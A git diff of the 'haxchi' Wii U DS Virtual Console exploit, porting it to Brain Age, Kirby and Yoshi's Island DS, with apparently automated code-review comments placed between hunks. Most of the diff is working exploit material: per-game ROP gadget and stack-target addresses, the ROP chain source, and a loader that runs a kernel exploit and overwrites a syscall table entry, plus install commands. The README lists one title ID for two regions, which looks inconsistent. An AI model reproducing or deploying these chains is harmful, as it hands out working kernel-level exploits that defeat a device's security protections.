diff --git a/Makefile b/Makefile index a3d024f..5db9de6 100644 --- a/Makefile +++ b/Makefile @@ -1,18 +1,50 @@ .PHONY := all code550.bin -all: WUP-N-DAAP.nds +all: brainage kirby yoshids brainage.zip kirby.zip yoshids.zip -code550.bin: +brainage: setup_brainage brainage.nds + +kirby: setup_kirby kirby.nds + +yoshids: setup_yoshids yoshids.nds + +setup_brainage: + rm -f *.bin @cd hbl_loader && make && cd .. + @cp -f brainage_defs.s defines.s -haxchi_rop_hook.bin haxchi_rop.bin: code550.bin haxchi_rop.s +setup_kirby: + rm -f *.bin + @cd hbl_loader && make && cd .. + @cp -f kirby_defs.s defines.s + +setup_yoshids: + rm -f *.bin + @cd hbl_loader && make && cd .. + @cp -f yoshids_defs.s defines.s + +brainage.nds: armips haxchi_rop.s - -WUP-N-DAAP.nds: haxchi_rop_hook.bin haxchi_rop.bin haxchi.s armips haxchi.s - zip -JXjq9 rom.zip WUP-N-DAAP.nds + +kirby.nds: + armips haxchi_rop.s + armips haxchi.s + +yoshids.nds: + armips haxchi_rop.s + armips haxchi.s + +brainage.zip: + zip -JXjq9 brainage.zip brainage.nds + +kirby.zip: + zip -JXjq9 kirby.zip kirby.nds + +yoshids.zip: + zip -JXjq9 yoshids.zip yoshids.nds clean: - @rm -f *.bin WUP-N-DAAP.nds rom.zip + @rm -f *.bin brainage.nds brainage.zip kirby.nds kirby.zip yoshids.nds yoshids.zip @cd hbl_loader && make clean && cd .. @echo "all cleaned up !" diff --git a/README.md b/README.md index 76a6809..202f117 100644 --- a/README.md +++ b/README.md 
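Review bot: The new `brainage`, `kirby`, `yoshids` and `setup_*` targets are commands, not files, but nothing declares them phony (the surviving `.PHONY := all code550.bin` is a variable assignment, not a `.PHONY:` rule), and `brainage: setup_brainage brainage.nds` only works because prerequisites happen to be processed left to right, which `make -j` does not guarantee. `brainage.nds:` and `brainage.zip:` (and their kirby/yoshids twins) list no prerequisites, so once the files exist a second `make` never regenerates them even after `haxchi.s` or a `*_defs.s` changes, and `clean` leaves the generated `defines.s` behind. All three `setup_*` recipes overwrite the same `defines.s` and `rm -f *.bin`, so the game builds cannot overlap; until the shared file goes away, `.NOTPARALLEL:` is the honest guard, and `cd hbl_loader && make && cd ..` should be `$(MAKE) -C hbl_loader` so `-j`/`-n` propagate. The sketch below shows the brainage rules; kirby and yoshids follow the same shape.
```make
.PHONY: all brainage kirby yoshids setup_brainage setup_kirby setup_yoshids clean
# setup_* all rewrite the shared defines.s, so the three game builds must not run concurrently
.NOTPARALLEL:

all: brainage kirby yoshids

brainage: brainage.zip
# … unchanged: kirby / yoshids aggregate targets …

setup_brainage:
	rm -f *.bin
	$(MAKE) -C hbl_loader
	cp -f brainage_defs.s defines.s
# … unchanged: setup_kirby / setup_yoshids …

brainage.nds: setup_brainage haxchi.s haxchi_rop.s coreinit.s brainage_defs.s
	armips haxchi_rop.s
	armips haxchi.s

brainage.zip: brainage.nds
	zip -JXjq9 $@ $<
# … unchanged: kirby / yoshids .nds and .zip rules …

clean:
	$(RM) *.bin defines.s brainage.nds brainage.zip kirby.nds kirby.zip yoshids.nds yoshids.zip
	$(MAKE) -C hbl_loader clean
	@echo "all cleaned up !"
```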
@@ -1,18 +1,25 @@ # haxchi -This is a ported version of the haxchi exploit created by smea and others for the european release of brain training. +This is a ported version of the haxchi exploit created by smea and others for all sorts of different ds vc games. In addition to being ported it also includes a homebrew launcher loader as its payload so you can use it for a lot of things. ## install process haxchi can be very easily installed using iosuhax's wupclient. for example, if hachihachi is installed to the MLC, it suffices to do: ``` - w.up("rom.zip", "/vol/storage_mlc01/usr/title/00050000/10179C00/content/0010/rom.zip") + w.up("rom.zip", "/vol/storage_mlc01/usr/title/00050000/YOUR_GAME_TITLE_ID/content/0010/rom.zip") ``` of course, using wupclient to install haxchi permanently requires that redNAND be disabled, unless hachihachi is installed to USB, in which case it can be installed from redNAND using: ``` - w.up("rom.zip", "/vol/storage_usb01/usr/title/00050000/10179C00/content/0010/rom.zip") + w.up("rom.zip", "/vol/storage_usb01/usr/title/00050000/YOUR_GAME_TITLE_ID/content/0010/rom.zip") ``` +make sure to replace YOUR_GAME_TITLE_ID with one of the following: +10179B00 - US Brain Age +10179C00 - PAL Brain Training +10198A00 - US Yoshi's Island DS +10198A00 - PAL Yoshi's Island DS +101A5600 - US Kirby Squeak Squad +101A5700 - PAL Kirby Mouse Attack ## contents diff --git a/brainage_defs.s b/brainage_defs.s new file mode 100644 index 0000000..3361889 --- /dev/null +++ b/brainage_defs.s 
@@ -0,0 +1,41 @@
+
+FILE_NDS_NAME equ "brainage.nds"
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x1076FAA4)
+
+HACHI_APPLICATION_PTR equ (0x10A6E038)
+
+ARM9_ROM_LOCATION equ (0x16220400)
+ARM7_ROM_MEM2_START equ (0xEBDDFC00)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02208F6C)
+BCTRL equ (RPX_OFFSET + 0x02208EA4)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x0209A500)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x0209A12C)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A38AC)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0216FBF0)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02279BB8)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0206966C)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A58C4)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200B8D0)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0207AD84)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205182C)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02014E0C)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0213FE6C)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0202028C)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x02223C40)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222405C)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x02223AEC) +HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02007774) +NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201BD28) +CORE_SHUTDOWN equ (RPX_OFFSET + 0x02222FBC) +_START_EXIT equ (RPX_OFFSET + 0x02022A70) diff --git a/coreinit.s b/coreinit.s new file mode 100644 index 0000000..865304b --- /dev/null +++ b/coreinit.s @@ -0,0 +1,19 @@ + +; constants for position calcs +COREINIT_OFFSET equ (- 0xFE3C00) + +; coreinit gadgets +MTCTR_R30_MR_R8R21_R7R29_R6R28_R5R27_R4R25_R3R24_BCTRL equ (COREINIT_OFFSET + 0x02002968) + +; coreinit functions +OS_CREATETHREAD equ (0x02025764 + COREINIT_OFFSET) +OS_GETTHREADAFFINITY equ (0x020266A4 + COREINIT_OFFSET) +OS_FORCEFULLRELAUNCH equ (0x02019BA8 + COREINIT_OFFSET) +OSCODEGEN_GETVARANGE equ (0x0201B1C0 + COREINIT_OFFSET) +OSCODEGEN_SWITCHSECMODE equ (0x0201B2C0 + COREINIT_OFFSET) +MEMCPY equ (0x02019BC8 + COREINIT_OFFSET) +DC_FLUSHRANGE equ (0x02007B88 + COREINIT_OFFSET) +IC_INVALIDATERANGE equ (0x02007CB0 + COREINIT_OFFSET) +OSSAVESDONE_READYTORELEASE equ (0x0201D5B8 + COREINIT_OFFSET) +OSRELEASEFOREGROUND equ (0x0201D5BC + COREINIT_OFFSET) +OSFATAL equ (0x02015218 + COREINIT_OFFSET) diff --git a/haxchi.s b/haxchi.s index 904da72..3f9796d 100644 --- a/haxchi.s +++ b/haxchi.s @@ -1,8 +1,7 @@ -.create "WUP-N-DAAP.nds", 0 -.nds +.include "defines.s" +.create FILE_NDS_NAME, 0 -; game stack return address -hax_target_address equ 0x1076FAA4 +.nds .org 0x000 .ascii "HAXCHI" ; Game Title @@ -19,7 +18,7 @@ hax_target_address equ 0x1076FAA4 .word arm9_data_end - arm9_data ; ARM9 size .word arm7_data ; ARM7 rom_offset .word 0x2000000 ; ARM7 entry_address - .word 0xEBDDFC00 + hax_target_address ; ARM7 ram_address + .word ARM7_ROM_MEM2_START + HAX_TARGET_ADDRESS ; ARM7 ram_address .word arm7_data_end - arm7_data ; ARM7 size .org 0x080 diff --git a/haxchi_rop.s b/haxchi_rop.s index 096b455..744757a 100644 --- a/haxchi_rop.s +++ b/haxchi_rop.s 
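Review bot: Nothing in `brainage_defs.s` records which title the addresses in it were taken from, even though the README hunk in this same commit lists separate US (`10179B00`) and PAL (`10179C00`) Brain Age/Brain Training IDs, presumably with different binaries; `HAX_TARGET_ADDRESS`, `ARM9_ROM_LOCATION` and the gadget offsets are only valid for the one they were dumped from, so a header such as `; brainage_defs.s: addresses for <TITLE_ID>/<region>, dumped on firmware <VERSION placeholder>; not valid for other regions` would spare the next person a crash-and-guess. The same applies to `kirby_defs.s` and `yoshids_defs.s`, whose README entries likewise come in US and PAL pairs. `RPX_OFFSET equ (0x01800000)` is repeated verbatim in all three files and could live in the shared include next to `COREINIT_OFFSET`.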
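Review bot: `COREINIT_OFFSET equ (- 0xFE3C00)` and the `OS_*`/`MEMCPY`/`OSFATAL` addresses below it are tied to one system firmware, but the file does not say which; the only hint elsewhere in the commit is `hbl_loader/Makefile` naming its output `code$(FIRMWARE).bin` (`code550.bin` in the top-level Makefile), so presumably 5.5.x. A first-line comment, `; coreinit.rpl addresses for firmware <VERSION placeholder>; rebase COREINIT_OFFSET when targeting another firmware`, would make that explicit. Minor: the gadget is written `(COREINIT_OFFSET + 0x02002968)` while every function is written `(0x... + COREINIT_OFFSET)`; pick one order.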
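Review bot: `.include "defines.s"` pulls in a file that is not part of the tree: the top-level Makefile's `setup_<game>` targets create it by copying `<game>_defs.s`, so running `armips haxchi.s` on a fresh checkout fails on the include with no hint of what is missing, and on a checkout where another game was set up last it silently builds that game's `FILE_NDS_NAME`. A comment above the include, `; defines.s is generated: the Makefile copies <game>_defs.s over it in setup_<game>; do not edit it directly`, documents the dependency where the reader trips over it. The header layout (`.create` before `.nds`) is otherwise unchanged in effect.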
@@ -1,64 +1,11 @@ - -; game stack return address -hax_target_address equ 0x1076FAA4 - -; constants for position calcs -COREINIT_OFFSET equ (- 0xFE3C00) -RPX_OFFSET equ (0x01800000) -SYSAPP_OFFSET equ (0x01B75D00) - -; rop-gadgets part 1 (used for all sorts of different things) -LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02208F6C) -MTCTR_R28_ADDI_R6x68_MR_R5R29_R4R22_R3R21_BCTRL equ (RPX_OFFSET + 0x02208E90) -BCTRL equ (RPX_OFFSET + 0x02208EA4) -MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x0209A500) -LWZ_R0x104_MTLR_R0_ADDI_R1x100_BLR equ (RPX_OFFSET + 0x020E0108) -LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x0209A12C) -LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A38AC) -MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0216FBF0) -LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02279BB8) -MTCTR_R30_MR_R8R21_R7R29_R6R28_R5R27_R4R25_R3R24_BCTRL equ (COREINIT_OFFSET + 0x02002968) - -; rop-gadgets part 2 (only used to set up core 0 thread stack) -LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0206966C) -MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A58C4) -LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200B8D0) -LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0207AD84) -LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205182C) -LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02014E0C) -LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0213FE6C) -MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 
0x0202028C) - -; functions used from game and libraries -NERD_CREATETHREAD equ (RPX_OFFSET + 0x02223C40) -NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222405C) -NERD_JOINTHREAD equ (RPX_OFFSET + 0x02223AEC) -HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02007774) -NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x201BD28) -CORE_SHUTDOWN equ (RPX_OFFSET + 0x02222FBC) -_START_EXIT equ (RPX_OFFSET + 0x02022A70) - -_SYSLAUNCHMIISTUDIO equ (SYSAPP_OFFSET + 0x020019D4) - -OS_CREATETHREAD equ (0x02025764 + COREINIT_OFFSET) -OS_GETTHREADAFFINITY equ (0x020266A4 + COREINIT_OFFSET) -OS_FORCEFULLRELAUNCH equ (0x02019BA8 + COREINIT_OFFSET) -OSCODEGEN_GETVARANGE equ (0x0201B1C0 + COREINIT_OFFSET) -OSCODEGEN_SWITCHSECMODE equ (0x0201B2C0 + COREINIT_OFFSET) -MEMCPY equ (0x02019BC8 + COREINIT_OFFSET) -DC_FLUSHRANGE equ (0x02007B88 + COREINIT_OFFSET) -IC_INVALIDATERANGE equ (0x02007CB0 + COREINIT_OFFSET) -OSSAVESDONE_READYTORELEASE equ (0x0201D5B8 + COREINIT_OFFSET) -OSRELEASEFOREGROUND equ (0x0201D5BC + COREINIT_OFFSET) -OSFATAL equ (0x02015218 + COREINIT_OFFSET) +.include "coreinit.s" +.include "defines.s" ; more useful definitions -CODEGEN_ADR equ 0x01800000 +CODEGEN_ADR equ (0x01800000) -HACHI_APPLICATION_PTR equ (0x10A6E038) - -NERD_THREAD0OBJECT equ (hax_target_address - 0x1000) -NERD_THREAD2OBJECT equ (hax_target_address - 0x2000) +NERD_THREAD0OBJECT equ (HAX_TARGET_ADDRESS - 0x1000) +NERD_THREAD2OBJECT equ (HAX_TARGET_ADDRESS - 0x2000) .macro set_sp,v .word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR 
@@ -155,17 +102,19 @@ NERD_THREAD2OBJECT equ (hax_target_address - 0x2000) ; hacked from arm7 ram offset (unsafe, game stack pointer) -.create "haxchi_rop_hook.bin", hax_target_address +.create "haxchi_rop_hook.bin", HAX_TARGET_ADDRESS .arm.big rop_hook_start: + ;call_func BCTRL, 0x0, 0x0, 0x0, 0x0 ; infinite loop + ;call_func OSFATAL, 0x1007E7A8, 0, 0, 0 ; move stack pointer to safe area set_sp (rop_start - 4) .Close ; original game arm9 ram offset (safe, normally arm9 code) -.create "haxchi_rop.bin", 0x16220400 +.create "haxchi_rop.bin", ARM9_ROM_LOCATION .arm.big rop_start: @@ -209,7 +158,7 @@ rop_start: ; prepare r31 to be a valid value for the next call .word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR .word 0xDEADBABE ; r30 - .word (0x1076FAA4-0x3000) ; r31 (has to be valid here) + .word (HAX_TARGET_ADDRESS-0x3000) ; r31 (has to be valid here) .word 0xDEAD0001 ; garbage ; loads the required value for the addition onto r3 later on .word LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR @@ -253,9 +202,6 @@ rop_start: call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0 call_func CORE_SHUTDOWN, 0, 0, 0, 0 - ; on exit we want to go into mii studio directly - call_func _SYSLAUNCHMIISTUDIO, 0x0, 0x0, 0x0, 0x0 - ; prepare system for foreground release call_func OSSAVESDONE_READYTORELEASE, 0, 0, 0, 0 diff --git a/hbl_loader/Makefile b/hbl_loader/Makefile index 88fc7d9..9e3d839 100644 --- a/hbl_loader/Makefile +++ b/hbl_loader/Makefile 
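Review bot: The two commented-out lines added after `rop_hook_start:` (`;call_func BCTRL, 0x0, 0x0, 0x0, 0x0 ; infinite loop` and `;call_func OSFATAL, 0x1007E7A8, 0, 0, 0`) are debugging leftovers; commented-out code rots as the macros and constants around it change, and the `0x1007E7A8` literal is explained nowhere. Either drop them or make them an explicit, documented debug switch (for example an `.if`-guarded block with a comment stating what each line is for). The `.create "haxchi_rop_hook.bin", HAX_TARGET_ADDRESS` change itself is consistent with the new `*_defs.s` files.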
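Review bot: `.word (HAX_TARGET_ADDRESS-0x3000) ; r31 (has to be valid here)` hard-codes a third slot in the same area that `NERD_THREAD0OBJECT equ (HAX_TARGET_ADDRESS - 0x1000)` and `NERD_THREAD2OBJECT equ (HAX_TARGET_ADDRESS - 0x2000)` already name at the top of the file; a named constant beside those, with a comment on what occupies `-0x3000`, keeps the layout of that area readable in one place. `rop_start:` begins outside this hunk.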
@@ -2,10 +2,11 @@ PATH := $(DEVKITPPC)/bin:$(PATH) PREFIX ?= powerpc-eabi- CC = $(PREFIX)gcc AS = $(PREFIX)gcc -CFLAGS = -std=gnu99 -Os -nostdinc -fno-builtin +CFLAGS = -std=gnu99 -O0 -nostdinc -fno-builtin -g ASFLAGS = -mregnames -x assembler-with-cpp LD = $(PREFIX)ld -LDFLAGS=-Ttext 1800000 --oformat binary -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/4.8.2 -lgcc +OBJCOPY = $(PREFIX)objcopy +LDFLAGS=-Ttext 1800000 -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/4.8.2 -lgcc OBJDUMP ?= $(PREFIX)objdump project := . root := $(CURDIR) @@ -35,11 +36,13 @@ main: sd_loader.h $(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S cp -r $(root)/*.o $(build) rm $(root)/*.o - $(LD) -s -o ../code$(FIRMWARE).bin $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) + $(LD) -o code$(FIRMWARE).elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map code.map + $(OBJCOPY) code$(FIRMWARE).elf -O binary ../code$(FIRMWARE).bin clean: rm -rf $(build) rm -rf sd_loader.h + rm -rf code$(FIRMWARE).elf code.map make clean -C sd_loader print_stats: diff --git a/hbl_loader/launcher.c b/hbl_loader/launcher.c index de6068d..1a79277 100644 --- a/hbl_loader/launcher.c +++ b/hbl_loader/launcher.c 
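Review bot: `CFLAGS = -std=gnu99 -O0 -nostdinc -fno-builtin -g` replaces `-Os` with `-O0`, which turns the shipped `code$(FIRMWARE).bin` into an unoptimised build: `-g` costs nothing in the final image because `objcopy -O binary` drops debug sections, but `-O0` grows the payload and typically uses more stack, and nothing in the commit says this is intended. If the goal is a readable `code$(FIRMWARE).elf`/`code.map` for debugging, `-Os -g` gives that without changing the payload. Also, `CFLAGS =` holds the whole flag set, so `make CFLAGS=...` from the command line silently drops `-nostdinc -fno-builtin`; keep the mandatory flags separate, e.g. `ALL_CFLAGS := -std=gnu99 -nostdinc -fno-builtin $(CFLAGS)`, and compile with `$(ALL_CFLAGS)`.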
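Review bot: The new link step writes `code$(FIRMWARE).elf` and `code.map` into the `hbl_loader` directory rather than `$(build)`, where every other intermediate of this rule goes, which is why `clean` needs the extra `rm -rf code$(FIRMWARE).elf code.map` (and `rm -rf` on two plain files should be `$(RM)`). Writing them as `$(LD) -o $(build)/code$(FIRMWARE).elf ... $(LDFLAGS) -Map $(build)/code.map` and `$(OBJCOPY) $(build)/code$(FIRMWARE).elf -O binary ../code$(FIRMWARE).bin` lets the existing `rm -rf $(build)` cover them. The unchanged `make clean -C sd_loader` two lines below should be `$(MAKE) clean -C sd_loader` so `-n` and the jobserver propagate. The `main:` rule header and its first recipe lines are outside this hunk.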
@@ -41,15 +41,19 @@ extern void KernelPatches(void); /* ****************************************************************** */ void __main(void) { - /* Quit ongoing menu load music */ unsigned int sound_handle = 0; - OSDynLoad_Acquire("snd_core.rpl", &sound_handle); - void (* AXInit)(); - void (* AXQuit)(); - OSDynLoad_FindExport(sound_handle, 0, "AXInit", &AXInit); - OSDynLoad_FindExport(sound_handle, 0, "AXQuit", &AXQuit); - AXInit(); - AXQuit(); + OSDynLoad_Acquire("sndcore2.rpl", &sound_handle); + if(sound_handle == 0) + { + /* Quit ongoing menu load music */ + OSDynLoad_Acquire("snd_core.rpl", &sound_handle); + void (* AXInit)(); + void (* AXQuit)(); + OSDynLoad_FindExport(sound_handle, 0, "AXInit", &AXInit); + OSDynLoad_FindExport(sound_handle, 0, "AXQuit", &AXQuit); + AXInit(); + AXQuit(); + } /* Get coreinit handle and keep it in memory */ unsigned int coreinit_handle; 
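Review bot: The new `if(sound_handle == 0)` decides on the handle variable rather than on the result of `OSDynLoad_Acquire("sndcore2.rpl", &sound_handle)`, and the intent — why a loadable `sndcore2.rpl` means the `AXInit()`/`AXQuit()` sequence must be skipped — is not written down; a comment such as `/* sndcore2.rpl present: <reason> - the snd_core AXInit/AXQuit workaround is not needed */` should state the actual reason. Inside the fallback branch `AXInit` and `AXQuit` are still called without checking that `OSDynLoad_Acquire("snd_core.rpl", ...)` and the two `OSDynLoad_FindExport` calls succeeded, so a failed lookup jumps through an uninitialised function pointer; initialise both to 0 and skip the calls when either stays 0, as the later `_SYSLaunchMiiStudio == (void*)0` check does. `__main` continues past the end of this hunk.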
@@ -82,6 +86,57 @@ void __main(void) if (private_data.OSEffectiveToPhysical((void *)0xa0000000) == (void *)0) run_kexploit(&private_data); + /* Prepare for _SYSLaunchMiiStudio thread */ + int (*OSCreateThread)(void *thread, void *entry, int argc, void *args, unsigned int stack, unsigned int stack_size, int priority, unsigned short attr); + int (*OSResumeThread)(void *thread); + int (*OSIsThreadTerminated)(void *thread); + + OSDynLoad_FindExport(coreinit_handle, 0, "OSCreateThread", &OSCreateThread); + OSDynLoad_FindExport(coreinit_handle, 0, "OSResumeThread", &OSResumeThread); + OSDynLoad_FindExport(coreinit_handle, 0, "OSIsThreadTerminated", &OSIsThreadTerminated); + + /* Allocate a stack for the thread */ + void *stack = private_data.MEMAllocFromDefaultHeapEx(0x1000, 0x20); + /* Create the thread variable */ + void *thread = private_data.MEMAllocFromDefaultHeapEx(0x1000, 8); + if(!thread || !stack) + ExitFailure(&private_data, "Thread memory allocation failed. Exit and re-enter browser."); + + /* Quickly find _SYSLaunchMiiStudio */ + unsigned int sysapp_handle; + void (*_SYSLaunchMiiStudio)(void) = 0; + OSDynLoad_Acquire("sysapp.rpl", &sysapp_handle); + OSDynLoad_FindExport(sysapp_handle, 0, "_SYSLaunchMiiStudio", &_SYSLaunchMiiStudio); + if(_SYSLaunchMiiStudio == (void*)0) + OSFatal("_SYSLaunchMiiStudio is not there?"); + + /* Do _SYSLaunchMiiStudio in core 1 */ + int ret = OSCreateThread(thread, _SYSLaunchMiiStudio, 0, (void*)0, (unsigned int)stack+0x1000, 0x1000, 0, 0x1A); + if (ret == 0) + ExitFailure(&private_data, "Failed to create thread. 
Exit and re-enter browser."); + + /* Schedule it for execution */ + OSResumeThread(thread); + + /* Can not use OSJoinThread, which hangs for some reason, so we use a detached one and wait for it to terminate */ + while(OSIsThreadTerminated(thread) == 0) + { + asm volatile ( + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + ); + } + + /* Free thread memory and stack */ + private_data.MEMFreeToDefaultHeap(thread); + private_data.MEMFreeToDefaultHeap(stack); + /* setup kernel copy data syscall */ kern_write((void*)(KERN_SYSCALL_TBL_2 + (0x25 * 4)), (unsigned int)KernelCopyData); diff --git a/kirby_defs.s b/kirby_defs.s new file mode 100644 index 0000000..8b90ae4 --- /dev/null +++ b/kirby_defs.s 
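Review bot: `OSCreateThread`, `OSResumeThread` and `OSIsThreadTerminated` are called straight after `OSDynLoad_FindExport` with no null check, while `_SYSLaunchMiiStudio` a few lines later gets `if(_SYSLaunchMiiStudio == (void*)0) OSFatal(...)`; the three are uninitialised locals, so a failed lookup is an indirect call to garbage. Initialise them to 0 and add `if(!OSCreateThread || !OSResumeThread || !OSIsThreadTerminated) OSFatal("coreinit thread exports missing");` before the allocations, and zero `sysapp_handle` so a failed `OSDynLoad_Acquire("sysapp.rpl", ...)` does not hand a stale handle to `FindExport`. Both `ExitFailure` messages end in "Exit and re-enter browser.", which reads as copied from the browser-launched loader; per the README this payload is started from a DS VC title, so the advice misleads users. The `while(OSIsThreadTerminated(thread) == 0)` nop loop pins the core until the Mii Studio launch thread finishes; a yield or short sleep would be kinder if coreinit offers one here. `__main` starts and ends outside this hunk.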
@@ -0,0 +1,41 @@
+
+FILE_NDS_NAME equ "kirby.nds"
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x107968AC)
+
+HACHI_APPLICATION_PTR equ (0x10c8c938)
+
+ARM9_ROM_LOCATION equ (0x1643F200)
+ARM7_ROM_MEM2_START equ (0xEBBC0E00)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02207084)
+BCTRL equ (RPX_OFFSET + 0x02206FBC)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3610)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A323C)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020ACA38)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179168)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B44)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018908)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AEA50)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4A8)
